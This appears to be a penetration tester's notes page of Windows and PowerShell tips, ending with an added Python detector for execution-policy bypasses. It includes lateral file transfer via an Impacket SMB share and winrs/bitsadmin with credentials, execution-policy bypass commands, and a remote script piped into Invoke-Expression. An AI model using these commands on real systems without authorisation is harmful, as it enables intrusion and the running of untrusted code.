# Notes

{% hint style="info" %}
Impacket has a module that opens a share on an SMB server for file transfer:

on Kali > impacket-smbserver -smb2support \<share name> \<directory>

on Target > net use z: \\\\\<kali ip>\\\<share name>

then just cd to z:
{% endhint %}

{% hint style="info" %}
git reset --hard = reset the repository's working tree to the last commit, discarding local changes (e.g. before updating the repository)
{% endhint %}

{% hint style="info" %}
pwsh = open PowerShell on Linux
{% endhint %}

{% hint style="info" %}
Change the PowerShell window's title:

$host.UI.RawUI.WindowTitle = "WINDOWS NAME"
{% endhint %}

{% hint style="info" %}

#### Change colors between quotes

set-psreadlineoption -colors @{ string = 'green' }
{% endhint %}

{% hint style="info" %}

#### WinFetch to display system info

(Invoke-WebRequest "https://raw.githubusercontent.com/lptstr/winfetch/master/winfetch.ps1" -UseBasicParsing).Content.Remove(0,1) | Invoke-Expression
{% endhint %}

```powershell
# Copy file to the machine

echo F | xcopy C:\Users\myuser\file.exe \\teste-machine\c$\Users\Public\file.exe /Y

winrs -r:<machine> -u:<user> -p:<pass> "bitsadmin /transfer WindowsUpdates /priority normal http://<ip>/<file> C:\\Users\\Public\\<file>"
```

#### Turn off Execution Policy:

```powershell
PS > $ExecPolicy = Get-ExecutionPolicy
PS > Set-ExecutionPolicy bypass
PS > .\ADRecon.ps1
PS > Set-ExecutionPolicy $ExecPolicy
```

```powershell
powershell.exe -ep bypass
```

```powershell
PS > $Env:PSExecutionPolicyPreference = 'Bypass'
```
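
For monitoring, the three forms above can be recognised in process command lines or script-block text. The following is an added example, not part of the original notes; the function names are hypothetical and the sample lines are constructed.

```python
import re

# The Set-ExecutionPolicy cmdlet and the environment-variable preference.
CMDLET_RE = re.compile(r"\bset-executionpolicy\b[^|;\n]*\bbypass\b", re.I)
ENV_RE = re.compile(r"\$env:PSExecutionPolicyPreference\s*=\s*['\"]?bypass\b", re.I)
# Any "-name bypass" pair; the name is checked separately because
# powershell.exe accepts -ep and abbreviations of -ExecutionPolicy.
SWITCH_RE = re.compile(r"(?<!\S)-(\w+)\s+['\"]?bypass\b", re.I)


def is_policy_switch(name):
    """True for 'ep' or any prefix of 'executionpolicy' of two or more letters."""
    name = name.lower()
    return name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name))


def classify(text):
    """Return the bypass forms present in one command line or script block."""
    hits = []
    if CMDLET_RE.search(text):
        hits.append("set-executionpolicy")
    # Drop cmdlet calls first so "Set-ExecutionPolicy -ExecutionPolicy Bypass"
    # is not also counted as a launch switch.
    rest = CMDLET_RE.sub(" ", text)
    if any(is_policy_switch(m.group(1)) for m in SWITCH_RE.finditer(rest)):
        hits.append("launch-switch")
    if ENV_RE.search(text):
        hits.append("env-preference")
    return hits


def scan(lines):
    """Return (line_number, forms) for every line that contains a bypass."""
    results = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, forms) for n, forms in results if forms]


# Constructed sample input, not taken from real logs.
SAMPLES = [
    "powershell.exe -ep bypass",
    r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\Temp\report.ps1",
    "Set-ExecutionPolicy bypass",
    "$Env:PSExecutionPolicyPreference = 'Bypass'",
    "powershell.exe -NoProfile -Command Get-ExecutionPolicy",
    "Set-ExecutionPolicy $ExecPolicy",
]

if __name__ == "__main__":
    for number, forms in scan(SAMPLES):
        print(number, ", ".join(forms), "|", SAMPLES[number - 1])
```

The last two sample lines are benign: reading the policy or restoring a saved value does not match any of the three forms.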
